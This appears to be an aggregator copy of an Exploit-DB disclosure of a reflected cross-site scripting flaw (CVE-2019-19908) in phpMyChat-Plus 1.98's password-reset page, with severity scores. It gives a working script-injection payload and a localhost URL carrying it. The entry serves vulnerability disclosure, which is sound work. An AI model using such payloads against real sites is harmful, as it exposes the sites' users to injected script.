Lucene search

K
exploitdbChris InzingaEDB-ID:47798
HistoryDec 20, 2019 - 12:00 a.m.

phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting

2019-12-2000:00:00
Chris Inzinga
www.exploit-db.com
93

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

AI Score

6.5

Confidence

High

EPSS

0.005

Percentile

77.5%

# Exploit Title: phpMyChat-Plus 1.98 - 'pmc_username' Reflected Cross-Site Scripting
# Date: 2019-12-19
# Exploit Author: Chris Inzinga
# Vendor Homepage: http://ciprianmp.com/latest/
# Download: https://sourceforge.net/projects/phpmychat/
# Tested On: Linux & Mac
# Version: 1.98
# CVE: CVE-2019-19908

Description: 
The "pmc_username" parameter of pass_reset.php is vulnerable to reflected XSS

Payload: 
"><script>alert('xss')</script>

Vulnerable URL: 
http://localhost/plus/pass_reset.php?L=english&pmc_username="><script>alert('xss')</script>

CVSS2

4.3

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

NONE

Integrity Impact

PARTIAL

Availability Impact

NONE

AV:N/AC:M/Au:N/C:N/I:P/A:N

CVSS3

6.1

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

CHANGED

Confidentiality Impact

LOW

Integrity Impact

LOW

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

AI Score

6.5

Confidence

High

EPSS

0.005

Percentile

77.5%